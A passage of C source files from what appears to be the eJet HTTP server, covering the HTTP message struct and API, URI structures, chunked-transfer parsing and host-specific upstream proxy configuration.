uint8 msgtype; /* 0-sending request 1-receiving request */
void * hl;
void * phost;
void * ploc;
int locinst_times;
void * cbobj;
hashtab_t * script_var_tab;
/* instanced variables from HTTPLoc, HTTPHost when HTTPMsg is created */
int matchnum;
ckstr_t matchstr[16];
char * root;
/* current message handling state */
int state;
time_t createtime;
time_t stamp;
/* client request and server response ip address of wap proxy system */
char srcip[41];
int srcport;
char dstip[41];
int dstport;
uint8 ssl_link;
/* the Flag used for determining if Request sent to server or not */
uint8 reqsent;
uint8 redirecttimes;
uint8 req_url_type; //0-relative 1-absolute
http_uri_t * uri;
http_uri_t * absuri;
http_uri_t * docuri;
/* the elements following form the request line. they are
* assigned value by invoker that would like to send request.
* these elements are origin data constructing request. */
int req_methind;
char req_meth[16];
char req_ver[16];
int req_ver_major;
int req_ver_minor;
/* following 7 elements are parsed to pointer to the location of msg->uri */
char * req_scheme;
int req_schemelen;
char * req_host;
int req_hostlen;
uint16 req_port;
char * req_path;
int req_pathlen;
char * req_query;
int req_querylen;
char * req_line;
int req_line_len;
char * req_content_type;
int req_contype_len;
char * req_useragent;
int req_useragent_len;
char * req_cookie;
int req_cookie_len;
/* variables for http-request receiving management */
int64 req_header_length;
int64 req_body_length;
int64 req_body_iolen;
uint8 req_chunk_state;
int64 req_chunk_iolen;
int64 req_chunk_size;
/* request body is too large, memory is not enough to hold them.
* we store the body content into a temperory file */
uint8 req_multipart;
uint8 req_file_cache;
char * req_file_name;
void * req_file_handle;
/* 0-no body 1-Content-Length body 2-Transfer-Encoding body 3-unknown body */
uint8 req_body_flag;
uint8 req_conn_keepalive;
/* the headers are made up of many HeaderUnits. these unit are
* generated by invoker that would like to send request.
* they are the origin data constructing request */
hashtab_t * req_header_table;
arr_t * req_header_list;
hashtab_t * req_cookie_table;
/* the following member are data buffer that above elements(reqline, headers)
* have their pointers to the location of buffer. */
frame_p req_header_stream;
frame_p req_body_stream;
frame_p req_stream;
void * req_chunk;
chunk_t * req_body_chunk;
int64 req_stream_sent;
int64 req_stream_recv;
/* by adopting zero-copy for higher performance, frame buffers of HTTPCon, which stores
octets from sockets, will be moved to following list, for further parsing or handling,
when receiving octest from client connection and forwarding to origin server.
the overhead of memory copy will be lessened significantly. */
arr_t * req_rcvs_list;
/* if content type of POST request is multipart form, every part is stored in list */
arr_t * req_formlist;
void * req_form_json;
void * req_form_kvobj;
void * req_query_kvobj;
/* TCP connection instance for the reading/writing of HTTP Request/Response */
void * pcon;
ulong conid;
ulong workerid;
/* redirect the request to a new URL with status code 302/301 */
uint8 redirected;
/* indicate current HTTPMsg is proxied to another origin server */
uint8 proxied : 4; //0-no proxy 1-original request 2-proxing request
uint8 cacheon : 4;
struct http_msg * proxymsg;
/* indicate the msg is Fast-CGI to Fast-CGI Processor Manager server */
uint8 fastcgi; //0-no fastcgi 1-send to FastCGI server
void * fcgimsg;
uint8 fcgi_resend;
char * fwdurl;
int fwdurllen;
/* determine if the requested host is reached via proxy */
char * proxy;
int proxyport;
//0-no partial,
uint8 partial_flag;
void * partial_list;
uint8 flag304; //not modified content, just return 304
/* the Flag indicated if application has issued the response to client
or the request to server */
int issued;
/* the first line of response contains following information. */
char res_ver[16];
int res_status;
uint32 res_verloc;
int res_verlen;
uint32 res_statusloc;
int res_statuslen;
uint32 res_reasonloc;
int res_reasonlen;
frame_p res_line;
/* the number of header/body octets received from server or high layer */
int64 res_header_length;
int64 res_body_length;
int64 res_body_iolen;
/* based on caching configure and cache policy in origin server response,
response body is cached into res_file_name, caching information is stored
in res_cache_name. */
char * res_file_name;
void * res_file_handle;
uint8 res_file_cache;
int64 cache_req_start;
int64 cache_req_off;
int64 cache_req_len;
void * res_cache_info;
/* 0-no body 1-Content-Length body 2-Transfer-Encoding body 3-unknown body */
uint8 res_body_flag;
uint8 res_conn_keepalive;
/* by parsing from raw octets, response headers are stored into HeaderUnits,
which organized by following hashtab and list. */
hashtab_t * res_header_table;
arr_t * res_header_list;
/* following frame buffers store headers or body data from origin server,
or higher layer module. access to header/body is just referenced to frame buffers.
* res_stream stores encoded headers to be delivered to client. */
frame_p res_header_stream;
frame_p res_body_stream;
frame_p res_stream;
/* response bodies with various formats are handled and store in chunk facilities. */
void * res_chunk;
chunk_t * res_body_chunk;
int64 res_stream_sent;
int64 res_stream_recv;
/* by adopting zero-copy for higher performance, frame buffers of HTTPCon, which stores
octets from sockets, will be moved to following list, for further parsing or handling,
when receiving octest from origin server connection and forwarding to client.
the overhead of memory copy will be lessened significantly. */
arr_t * res_rcvs_list;
/* system management instance */
void * pcore;
void * httpmgmt;
/* notify upper-layer application while TCP connection tear-down */
TearDownNotify * tear_down_notify;
void * tear_down_para;
RecvAllNotify * resnotify;
uint8 resnotify_called;
void * resnotify_para;
void * resnotify_cbval;
char * res_store_file;
int64 res_store_offset;
ProcessNotify * res_recv_procnotify;
void * res_recv_procnotify_para;
uint64 res_recv_procnotify_cbval;
ProcessNotify * req_send_procnotify;
void * req_send_procnotify_para;
uint64 req_send_procnotify_cbval;
int (*SetTearDownNotify)(void * vmsg, void * func, void * para);
int (*SetResponseNotify)(void * vmsg, void * func, void * para, void * cbval,
char * storefile, int64 offset,
void * procnotify, void * notifypara, uint64 notifycbval);
int (*SetResStoreFile) (void * vmsg, char * storefile, int64 offset);
int (*SetResRecvAllNotify) (void * vmsg, void * func, void * para, void * cbval);
int (*SetResRecvProcNotify) (void * vmsg, void * procnotify, void * para, uint64 cbval);
int (*SetReqSendProcNotify) (void * vmsg, void * procnotify, void * para, uint64 cbval);
char * (*GetMIME) (void * vmsg, char * extname, uint32 * mimeid);
void * (*GetMIMEMgmt) (void * vmsg);
void * (*GetEPump) (void * vmsg);
void * (*GetHTTPMgmt) (void * vmsg);
void * (*GetCBObj) (void * vmsg);
void * (*GetMgmtObj) (void * vmsg);
void * (*GetMsgObj) (void * vmsg);
void * (*GetIODev) (void * vmsg);
frame_p (*GetFrame) (void * vmsg);
int (*RecycleFrame) (void * vmsg, frame_p frame);
void * (*Fetch) (void * vmsg);
int (*Init) (void * vmsg);
int (*InitReq) (void * vmsg);
int (*InitRes) (void * vmsg);
int (*Recycle) (void * vmsg);
int (*Close) (void * vmsg);
int (*CacheType) (void * vmsg, int respornot);
char * (*CacheFile) (void * vmsg, int respornot);
char * (*GetSrcIP) (void * vmsg);
int (*GetSrcPort) (void * vmsg);
ulong (*GetMsgID) (void * vmsg);
int (*GetMethodInd) (void * vmsg);
char * (*GetMethod) (void * vmsg);
int (*SetMethod) (void * vmsg, char * meth, int methlen);
char * (*GetURL) (void * vmsg);
int (*SetURL) (void * vmsg, char * url, int len, int decode);
char * (*GetDocURL) (void * vmsg);
int (*SetDocURL) (void * vmsg, char * url, int len, int decode, int instbrk);
int (*GetBaseURL) (void * vmsg, char ** p, int * plen);
char * (*GetAbsURL) (void * vmsg);
char * (*GetRelativeURL) (void * vmsg);
int (*GetSchemeP) (void * vmsg, char ** pscheme, int * plen);
int (*GetScheme) (void * vmsg, char * pscheme, int len);
int (*GetHostP) (void * vmsg, char ** phost, int * plen);
int (*GetHost) (void * vmsg, char * phost, int len);
int (*GetPort) (void * vmsg);
char * (*GetRootPath) (void * vmsg);
int (*GetPathP) (void * vmsg, char ** ppath, int * plen);
int (*GetPath) (void * vmsg, char * path, int len);
int (*GetPathOnly) (void * vmsg, char * path, int len);
int (*GetFileOnly) (void * vmsg, char * file, int len);
int (*GetFileExt) (void * vmsg, char * fileext, int len);
int (*GetRealPath) (void * vmsg, char * path, int len);
int (*GetRealFile) (void * vmsg, char * path, int len);
int (*GetLocFile) (void * vmsg, char * p, int len, char * f, int flen, char * d, int dlen);
int (*GetQueryP) (void * vmsg, char ** pquery, int * plen);
int (*GetQuery) (void * vmsg, char * query, int len);
int (*GetQueryValueP) (void * vmsg, char * key, char ** pval, int * vallen);
int (*GetQueryValue) (void * vmsg, char * key, char * val, int vallen);
int (*GetQueryUint) (void * vmsg, char * key, uint32 * val);
int (*GetQueryInt) (void * vmsg, char * key, int * val);
int (*GetQueryUlong) (void * vmsg, char * key, ulong * val);
int (*GetQueryLong) (void * vmsg, char * key, long * val);
int (*GetQueryInt64) (void * vmsg, char * key, int64 * val);
int (*GetQueryUint64) (void * vmsg, char * key, uint64 * val);
int (*GetQueryKeyExist)(void * vmsg, char * key);
int (*GetReqContentP) (void * vmsg, void ** pform, int * plen);
int (*GetReqContent) (void * vmsg, void * form, int len);
int (*GetReqFormJsonValueP) (void * vmsg, char * key, char ** ppval, int * vallen);
int (*GetReqFormJsonValue) (void * vmsg, char * key, char * pval, int vallen);
int (*GetReqFormJsonKeyExist)(void * vmsg, char * key);
int (*GetReqFormDecodeValue) (void * vmsg, char * key, char * pval, int vallen);
int (*GetReqFormValueP) (void * vmsg, char * key, char ** ppval, int * vallen);
int (*GetReqFormValue) (void * vmsg, char * key, char * pval, int vallen);
int (*GetReqFormUint) (void * vmsg, char * key, uint32 * val);
int (*GetReqFormInt) (void * vmsg, char * key, int * val);
int (*GetReqFormUlong) (void * vmsg, char * key, ulong * val);
int (*GetReqFormLong) (void * vmsg, char * key, long * val);
int (*GetReqFormUint64) (void * vmsg, char * key, uint64 * val);
int (*GetReqFormKeyExist)(void * vmsg, char * key);
int (*GetReqHdrNum) (void * vmsg);
int (*GetReqHdrIndP) (void * vmsg, int i, char ** pn, int * nlen, char ** pv, int * vlen);
int (*GetReqHdrInd) (void * vmsg, int i, char * pn, int nlen, char * pv, int vlen);
int (*GetReqHdrP) (void * vmsg, char * n, int nlen, char ** pval, int * vlen);
int (*GetReqHdr) (void * vmsg, char * name, int nlen, char * val, int vlen);
int (*GetReqHdrInt) (void * vmsg, char * name, int namelen);
long (*GetReqHdrLong) (void * vmsg, char * name, int namelen);
ulong (*GetReqHdrUlong) (void * vmsg, char * name, int namelen);
int64 (*GetReqHdrInt64) (void * vmsg, char * name, int namelen);
uint64 (*GetReqHdrUint64) (void * vmsg, char * name, int namelen);
int (*GetReqContentTypeP)(void * vmsg, char ** ptype, int * typelen);
int (*GetReqContentType) (void * vmsg, char * type, int typelen);
int (*GetReqContentLength)(void * vmsg);
int (*GetReqEtag) (void * vmsg, char * etag, int etaglen);
int (*GetCookieP) (void * vmsg, char * name, int nlen, char ** pv, int * vlen);
int (*GetCookie) (void * vmsg, char * name, int nlen, char * val, int vlen);
int (*ParseReqMultipartForm) (void * vmsg, arr_t * formdatalist);
int (*DisplayDirectory) (void * vmsg);
int (*AddReqHdr) (void * vmsg, char * na, int nlen, char * val, int vlen);
int (*AddReqHdrInt) (void * vmsg, char * name, int namelen, int value);
int (*AddReqHdrUint32)(void * vmsg, char * name, int namelen, uint32 value);
int (*AddReqHdrLong) (void * vmsg, char * name, int namelen, long value);
int (*AddReqHdrUlong) (void * vmsg, char * name, int namelen, ulong value);
int (*AddReqHdrInt64) (void * vmsg, char * name, int namelen, int64 value);
int (*AddReqHdrUint64)(void * vmsg, char * name, int namelen, uint64 value);
int (*AddReqHdrDate) (void * vmsg, char * name, int namelen, time_t dtime);
int (*DelReqHdr) (void * vmsg, char * name, int namelen);
int (*SetReqContentType) (void * vmsg, char * type, int typelen);
int (*SetReqContentLength) (void * vmsg, int64 len);
int (*SetReqContent) (void * vmsg, void * body, int bodylen);
int (*SetReqFileContent) (void * vmsg, char * filename);
int (*AddReqContent) (void * vmsg, void * body, int64 bodylen);
int (*AddReqContentPtr) (void * vmsg, void * body, int64 bodylen);
int (*AddReqFile) (void * vmsg, char * filename, int64 startpos, int64 len);
int (*AddReqAppCBContent) (void * vmsg, void * prewrite, void * prewobj, int64 offset, int64 length,
void * movefunc, void * movepara, void * endwrite, void * endwobj);
int (*GetStatus) (void * vmsg, char * reason, int * reasonlen);
int (*GetResHdrNum) (void * vmsg);
int (*GetResHdrIndP) (void * vmsg, int i, char **pn, int * nlen, char **pv, int * vlen);
int (*GetResHdrInd) (void * vmsg, int i, char *pn, int nlen, char *pv, int vlen);
int (*GetResHdrP) (void * vmsg, char * n, int nlen, char ** pval, int * vlen);
int (*GetResHdr) (void * vmsg, char * name, int nlen, char * val, int vlen);
int (*GetResHdrInt) (void * vmsg, char * name, int namelen);
long (*GetResHdrLong) (void * vmsg, char * name, int namelen);
ulong (*GetResHdrUlong) (void * vmsg, char * name, int namelen);
int64 (*GetResHdrInt64) (void * vmsg, char * name, int namelen);
uint64 (*GetResHdrUint64) (void * vmsg, char * name, int namelen);
int (*GetResContentTypeP)(void * vmsg, char ** ptype, int * typelen);
int (*GetResContentType) (void * vmsg, char * type, int typelen);
int (*GetResContentTypeID)(void * vmsg, uint32 * mimeid, char ** pext);
int64 (*GetResContentLength)(void * vmsg);
int (*GetResContent) (void * vmsg, void * body, int bodylen);
int (*GetResContentP) (void * vmsg, int64 pos, void ** pbody, int64 * bodylen);
int (*SetStatus) (void * vmsg, int code, char * reason);
int (*AddResHdr) (void * vmsg, char * na, int nlen, char * val, int vlen);
int (*AddResHdrInt) (void * vmsg, char * name, int namelen, int value);
int (*AddResHdrUint32)(void * vmsg, char * name, int namelen, uint32 value);
int (*AddResHdrLong) (void * vmsg, char * name, int namelen, long value);
int (*AddResHdrUlong) (void * vmsg, char * name, int namelen, ulong value);
int (*AddResHdrInt64)(void * vmsg, char * name, int namelen, int64 value);
int (*AddResHdrUint64)(void * vmsg, char * name, int namelen, uint64 value);
int (*AddResHdrDate) (void * vmsg, char * name, int namelen, time_t dtime);
int (*DelResHdr) (void * vmsg, char * name, int namelen);
int (*SetResEtag) (void * vmsg, char * etag, int etaglen);
int (*SetCookie) (void * vmsg, char * name, char * value,
time_t expire, char * path, char * domain, uint8 secure);
int (*Check304Resp) (void * vmsg, uint64 mediasize, time_t mtime, uint32 inode);
int (*SetResContentType) (void * vmsg, char * type, int typelen);
int (*SetResContentTypeID) (void * vmsg, uint32 mimeid);
int (*SetResContentLength) (void * vmsg, int64 len);
int (*AddResContent) (void * vmsg, void * body, int64 bodylen);
int (*AddResStripContent) (void * vmsg, void * body, int64 bodylen,
char * escch, int chlen);
int (*AddResContentPtr) (void * vmsg, void * body, int64 bodylen);
int (*AddResFile) (void * vmsg, char * filename, int64 startpos, int64 len);
int (*AddResAppCBContent) (void * vmsg, void * prewrite, void * prewobj, int64 offset, int64 length,
void * movefunc, void * movepara, void * endwrite, void * endwobj);
int (*AddResTpl) (void * vmsg, void * pbyte, int bytelen, void * tplvar);
int (*AddResTplFile) (void * vmsg, char * tplfile, void * tplvar);
int (*AsynReply) (void * vmsg, int bodyend, int probewrite);
int (*Reply) (void * vmsg);
int (*ReplyFeeding) (void * vmsg);
int (*ReplyFeedingEnd) (void * vmsg);
int (*RedirectReply) (void * vmsg, int status, char * redurl);
uint8 extdata[1];
} HTTPMsg;
int http_msg_cmp_http_msg(void * a, void * b);
int http_msg_cmp_msgid (void * a, void * pat);
ulong http_msg_hash_msgid (void * key);
/* http message instance release/initialize/recycle routines */
int http_msg_free (void * vmsg);
int http_msg_init (void * vmsg);
int http_msg_recycle (void * vmsg);
int http_msg_close (void * vmsg);
int http_msg_init_method (void * vmsg);
int http_msg_init_req (void * vmsg);
int http_msg_init_res (void * vmsg);
char * http_msg_srcip (void * vmsg);
int http_msg_srcport (void * vmsg);
ulong http_msg_id (void * vmsg);
void * http_msg_cbobj (void * vmsg);
void * http_msg_obj (void * vmsg);
void * http_msg_mgmtobj (void * vmsg);
void * http_msg_newmsg (void * vmsg);
char * http_msg_get_mime (void * vmsg, char * extname, uint32 * mimeid);
void * http_msg_get_mimemgmt (void * vmsg);
int http_msg_set_teardown_notify (void * vmsg, void * func, void * para);
int http_msg_set_response_notify (void * vmsg, void * func, void * para, void * cbval,
char * storefile, int64 offset,
void * procnotify, void * notifypara, uint64 notifycbval);
int http_msg_set_res_store_file (void * vmsg, char * storefile, int64 offset);
int http_msg_set_res_recvall_notify (void * vmsg, void * func, void * para, void * cbval);
int http_msg_set_res_recvproc_notify (void * vmsg, void * procnotify, void * para, uint64 cbval);
int http_msg_set_req_sendproc_notify (void * vmsg, void * procnotify, void * para, uint64 cbval);
/* 1 - temporary cache file
2 - application-given file for storing response body
3 - proxy cache file with partial content
4 - proxy cache file will all content */
int http_msg_cache_type (void * vmsg, int respornot);
char * http_msg_cache_file (void * vmsg, int respornot);
int http_msg_mgmt_add (void * vmgmt, void * vmsg);
void * http_msg_mgmt_get (void * vmgmt, ulong msgid);
void * http_msg_mgmt_del (void * vmgmt, ulong msgid);
int http_msg_var_set (void * vmsg, char * name, char * value, int valuelen);
int http_msg_var_get (void * vmsg, char * name, char * value, int valuelen);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>include/http_uri.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_URI_H_
#define _HTTP_URI_H_
#ifdef __cplusplus
extern "C" {
#endif
typedef struct http_uri_s {
frame_t * uri;
uint8 type; //0-relative 1-absolute 2-connect uri
uint8 ssl_link; //0-regular 1-ssl
char * reluri;
int relurilen;
char * baseuri;
int baseurilen;
char * rooturi;
int rooturilen;
char * scheme;
int schemelen;
char * host;
int hostlen;
int port;
char * path;
int pathlen;
char * query;
int querylen;
char * dir;
int dirlen;
char * file;
int filelen;
char * file_base;
int file_baselen;
char * file_ext;
int file_extlen;
} HTTPUri, http_uri_t;
void * http_uri_alloc();
void http_uri_free (void * vuri);
void http_uri_init (void * vuri);
int http_uri_set (void * vuri, char * p, int len, int decode);
int http_uri_parse (void * vuri);
int http_uri_path_parse (void * vuri);
char * http_uri_string (void * vuri);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>src/http_chunk.c<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#include "adifall.ext"
#include "http_chunk.h"
void * http_buf_alloc ()
{
HTTPBuf * pbuf = NULL;
pbuf = kzalloc(sizeof(*pbuf));
return pbuf;
}
void http_buf_free (void * vbuf)
{
HTTPBuf * pbuf = (HTTPBuf *)vbuf;
if (!pbuf) return;
if (pbuf->alloc) {
kfree(pbuf->pbgn);
}
kfree(pbuf);
}
void * http_buf_dup (void * vbuf)
{
HTTPBuf * pbuf = (HTTPBuf *)vbuf;
HTTPBuf * dup = NULL;
dup = http_buf_alloc();
if (!pbuf) return dup;
dup->pbgn = pbuf->pbgn;
dup->len = pbuf->len;
dup->body_bgn = pbuf->body_bgn;
dup->body_len = pbuf->body_len;
dup->alloc = 0;
return dup;
}
void * http_chunk_item_alloc ()
{
HTTPChunkItem * item = NULL;
item = kzalloc(sizeof(*item));
if (!item) return NULL;
return item;
}
void http_chunk_item_free (void * vitem)
{
HTTPChunkItem * item = (HTTPChunkItem *)vitem;
if (!item) return;
kfree(item);
}
void * http_chunk_item_dup (void * vitem)
{
HTTPChunkItem * item = (HTTPChunkItem *)vitem;
HTTPChunkItem * dup = NULL;
dup = http_chunk_item_alloc();
if (!item) return dup;
dup->chksize = item->chksize;
dup->chklen = item->chklen;
dup->recvsize = item->recvsize;
dup->recvlen = item->recvlen;
dup->gotall = item->gotall;
return dup;
}
void * http_chunk_alloc ()
{
HTTPChunk * chk = NULL;
chk = kzalloc(sizeof(*chk));
if (!chk) return NULL;
chk->item_list = arr_new(4);
chk->chunk = chunk_new(16384);
return chk;
}
int http_chunk_zero (void * vchk)
{
HTTPChunk * chk = (HTTPChunk *)vchk;
int i, num;
if (!chk) return -1;
chk->gotall = 0;
chk->gotallbody = 0;
chk->chksize = 0;
chk->chklen = 0;
chk->recvsize = 0;
chk->recvlen = 0;
chk->chknum = 0;
if (chk->curitem) {
http_chunk_item_free(chk->curitem);
chk->curitem = NULL;
}
num = arr_num(chk->item_list);
for (i = 0; i < num; i++) {
http_chunk_item_free(arr_value(chk->item_list, i));
}
arr_zero(chk->item_list);
chk->enthdrsize = 0;
if (chk->enthdr) {
http_buf_free(chk->enthdr);
chk->enthdr = NULL;
}
chunk_zero(chk->chunk);
return 0;
}
void http_chunk_free (void * vchk)
{
HTTPChunk * chk = (HTTPChunk *)vchk;
HTTPChunkItem * item = NULL;
int i, num;
if (!chk) return;
if (chk->curitem)
http_chunk_item_free(chk->curitem);
num = arr_num(chk->item_list);
for (i = 0; i < num; i++) {
item = arr_value(chk->item_list, i);
http_chunk_item_free(item);
}
arr_free(chk->item_list);
http_buf_free(chk->enthdr);
chunk_free(chk->chunk);
kfree(chk);
}
chunk_t * http_chunk_obj (void * vchk)
{
HTTPChunk * chk = (HTTPChunk *)vchk;
if (!chk) return NULL;
return chk->chunk;
}
int http_chunk_gotall (void * vchk)
{
HTTPChunk * chk = (HTTPChunk *)vchk;
if (!chk) return 0;
return chk->gotall;
}
void * http_chunk_dup (void * vchk)
{
HTTPChunk * chk = (HTTPChunk *)vchk;
HTTPChunk * dup = NULL;
HTTPChunkItem * item = NULL;
int i, num;
dup = http_chunk_alloc();
if (!chk) return dup;
dup->gotall = chk->gotall;
dup->gotallbody = chk->gotallbody;
dup->chksize = chk->chksize;
dup->chklen = chk->chklen;
dup->recvsize = chk->recvsize;
dup->recvlen = chk->recvlen;
dup->chknum = chk->chknum;
if (chk->curitem) {
dup->curitem = http_chunk_item_dup(chk->curitem);
} else {
dup->curitem = NULL;
}
num = arr_num(chk->item_list);
for (i = 0; i < num; i++) {
item = http_chunk_item_dup(arr_value(chk->item_list, i));
arr_push(dup->item_list, item);
}
dup->enthdrsize = chk->enthdrsize;
dup->enthdr = http_buf_dup(chk->enthdr);
return dup;
}
/* return value:
< 0, error
= 0, waiting more data
> 0, parse successfully
*/
int http_chunk_add_bufptr (void * vchk, void * vbgn, int len, int * rmlen)
{
HTTPChunk * chk = (HTTPChunk *)vchk;
HTTPChunkItem * item = NULL;
HTTPBuf * pbuf = NULL;
int restnum = 0;
int64 chksizelen = 0;
int64 chkbodylen = 0;
int64 restlen = 0;
uint8 * pbgn = (uint8 *)vbgn;
uint8 * poct = NULL;
uint8 * pcrlf = NULL;
uint8 * pend = NULL;
if (!chk) return -1;
pend = pbgn + len;
while (!chk->gotallbody && pbgn < pend) {
if ( (item = chk->curitem) == NULL ) {
chkbodylen = strtoll((char *)pbgn, (char **)&poct, 16);
pcrlf = sun_find_bytes(pbgn, pend - pbgn, "\r\n", 2, NULL);
if (!pcrlf) {
/* lack bytes to form chunk-size line, waiting for more data */
if (rmlen) *rmlen = pbgn - (uint8 *)vbgn;
return 0;
}
if (poct != pcrlf) {
/* there is irrelavent bytes intervened between chunk-size and \r\n */
//return -100;
}
poct = pcrlf + 2;
chksizelen = poct - pbgn;
item = chk->curitem = http_chunk_item_alloc();
if (!item) return -10;
if (chkbodylen > 0)
item->chksize = chksizelen + chkbodylen + 2;
else
item->chksize = chksizelen + chkbodylen;
item->chklen = chkbodylen;
item->recvsize = chksizelen;
item->recvlen = 0;
chk->chksize += item->chksize;
chk->chklen += item->chklen;
chk->recvsize += chksizelen;
chk->chknum++;
if (chkbodylen == 0) {
/* 0\r\n
* \r\n */
arr_push(chk->item_list, item);
chk->curitem = NULL;
chk->gotallbody = 1;
chunk_set_end(chk->chunk);
pbgn = poct;
break;
}
} else {
poct = pbgn;
}
restlen = item->chksize - item->recvsize;
restnum = pend - poct;
if (restnum >= restlen) {
item->gotall = 1;
item->recvsize += restlen;
item->recvlen += restlen - 2; //trailer \r\n should be detracted
chk->recvsize += restlen;
chk->recvlen += restlen - 2;
chunk_add_bufptr(chk->chunk, poct, restlen - 2, NULL);
arr_push(chk->item_list, item);
chk->curitem = NULL;
pbgn = poct + restlen;
} else {
item->gotall = 0;
item->recvsize += restnum;
chk->recvsize += restnum;
item->recvlen += min(restnum, restlen);
chk->recvlen += min(restnum, restlen);
chunk_add_bufptr(chk->chunk, poct, min(restnum, restlen), NULL);
if (rmlen) *rmlen = len;
return 0; //waiting for more data
}
} //end while
if (chk->gotallbody && !chk->gotall) {
if (pend - pbgn >= 2 && pbgn[0] == '\r' && pbgn[1] == '\n') {
poct = pbgn + 2;
} else {
pcrlf = sun_find_bytes(pbgn, pend - pbgn, "\r\n\r\n", 4, NULL);
if (!pcrlf) {
/* lack bytes to form chunk-size line, waiting for more data */
if (rmlen) *rmlen = pbgn - (uint8 *)vbgn;
return 0;
}
poct = pcrlf + 4;
}
chk->chksize += poct - pbgn;
chk->recvsize += poct - pbgn;
chk->enthdrsize = poct - pbgn;
chk->enthdr = pbuf = http_buf_alloc();
pbuf->pbgn = pbgn;
pbuf->len = poct - pbgn;
pbuf->body_bgn = pbgn;
pbuf->body_len = poct - pbgn;
if (rmlen) *rmlen = poct - (uint8 *)vbgn;
chk->gotall = 1;
chunk_set_end(chk->chunk);
return 1;
}
if (rmlen) *rmlen = pbgn - (uint8 *)vbgn;
/* why reached here? */
return 1;
}
<|start_filename|>include/http_cc.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_CONGESTION_H_
#define _HTTP_CONGESTION_H_
#ifdef __cplusplus
extern "C" {
#endif
int http_cli_recv_cc (void * vcon);
int http_cli_send_cc (void * vcon);
int http_srv_recv_cc (void * vcon);
int http_srv_send_cc (void * vcon);
int http_fcgi_recv_cc (void * vcon);
int http_fcgi_send_cc (void * vcon);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>src/http_sndpxy.c<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#include "adifall.ext"
#include "http_sndpxy.h"
#include "http_mgmt.h"
#include "http_msg.h"
void * send_proxy_alloc ()
{
SendProxy * sndpxy = NULL;
sndpxy = kzalloc(sizeof(*sndpxy));
return sndpxy;
}
void send_proxy_free (void * vsndpxy)
{
SendProxy * sndpxy = (SendProxy *)vsndpxy;
if (!sndpxy) return;
if (sndpxy->host)
kfree(sndpxy->host);
if (sndpxy->preg) {
#ifdef UNIX
regfree(sndpxy->preg);
kfree(sndpxy->preg);
#endif
#if defined(_WIN32) || defined(_WIN64)
pcre_free(sndpxy->preg);
#endif
}
if (sndpxy->proxy)
kfree(sndpxy->proxy);
kfree(sndpxy);
}
/* next proxy host and port when sending http request * /
* proxy setting = {
* / *# left-side is regular express to request host:port, right-side is proxy host and port * /
* ^(.+)sina.com.cn$ = 172.16.17.32:8080;
* };
*/
int http_send_proxy_init (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
void * jsndpxy = NULL;
int ret = 0;
int i, num = 0;
SendProxy * sndpxy = NULL;
char * key;
int keylen = 0;
char * data;
int datalen = 0;
char * plist[4];
int plen[4];
if (!mgmt) return -1;
if (mgmt->sndpxy_list == NULL)
mgmt->sndpxy_list = arr_new(4);
ret = json_mget_obj(mgmt->cnfjson, "http.send request.proxy setting", -1, &jsndpxy);
if (ret <= 0) return 0;
num = json_num(jsndpxy);
for (i = 0; i < num; i++) {
ret = json_iter(jsndpxy, i, (void **)&key, &keylen, (void **)&data, &datalen, NULL);
if (ret <= 0) continue;
if (!key || keylen <= 0) continue;
if (!data || datalen <= 0) continue;
sndpxy = send_proxy_alloc();
if (!sndpxy) continue;
sndpxy->host = str_dup(key, keylen);
#ifdef UNIX
sndpxy->preg = kzalloc(sizeof(regex_t));
regcomp(sndpxy->preg, sndpxy->host, REG_EXTENDED | REG_ICASE);
#endif
#if defined(_WIN32) || defined(_WIN64)
sndpxy->preg = pcre_compile(sndpxy->host, PCRE_CASELESS, &key, &keylen, NULL);
#endif
ret = string_tokenize(data, datalen, ":", 1, (void **)plist, plen, 4);
if (ret <= 0) {
send_proxy_free(sndpxy);
continue;
}
sndpxy->proxy = str_dup(plist[0], plen[0]);
if (ret > 1) {
sndpxy->port = str_to_int(plist[1], plen[1], 10, NULL);
}
arr_push(mgmt->sndpxy_list, sndpxy);
}
tolog(1, "eJet - %d Proxy Setting loaded for host-specific http request.\n", num);
return i;
}
void http_send_proxy_clean (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
if (!mgmt) return;
if (mgmt->sndpxy_list) {
arr_pop_free(mgmt->sndpxy_list, send_proxy_free);
mgmt->sndpxy_list = NULL;
}
tolog(1, "eJet - Proxy Setting for host-specific http request cleaned.\n");
}
int http_send_proxy_check (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMgmt * mgmt = NULL;
SendProxy * sndpxy = NULL;
char buf[256];
int i, num;
int ret = 0;
#ifdef UNIX
regmatch_t pmat[16];
#endif
#if defined(_WIN32) || defined(_WIN64)
int ovec[36];
#endif
if (!msg) return -1;
mgmt = (HTTPMgmt *)msg->httpmgmt;
if (!mgmt) return -2;
str_secpy(buf, sizeof(buf)-1, msg->req_host, msg->req_hostlen);
if (!msg->ssl_link && msg->req_port != 80) {
sprintf(buf + strlen(buf), ":%d", msg->req_port);
} else if (msg->ssl_link && msg->req_port != 443) {
sprintf(buf + strlen(buf), ":%d", msg->req_port);
}
num = arr_num(mgmt->sndpxy_list);
for (i = 0; i < num; i++) {
sndpxy = arr_value(mgmt->sndpxy_list, i);
if (!sndpxy) continue;
#ifdef UNIX
ret = regexec(sndpxy->preg, buf, 16, pmat, 0);
if (ret == 0) {
#endif
#if defined(_WIN32) || defined(_WIN64)
ret = pcre_exec(sndpxy->preg, NULL, buf, strlen(buf), 0, 0, ovec, 36);
if (ret > 0) {
#endif
msg->proxy = sndpxy->proxy;
if (sndpxy->port == 0) {
msg->proxyport = msg->ssl_link ? 443 : 80;
} else {
msg->proxyport = sndpxy->port;
}
msg->dstport = msg->proxyport;
return 1;
}
}
return 0;
}
<|start_filename|>src/http_pump.c<|end_filename|>
/*
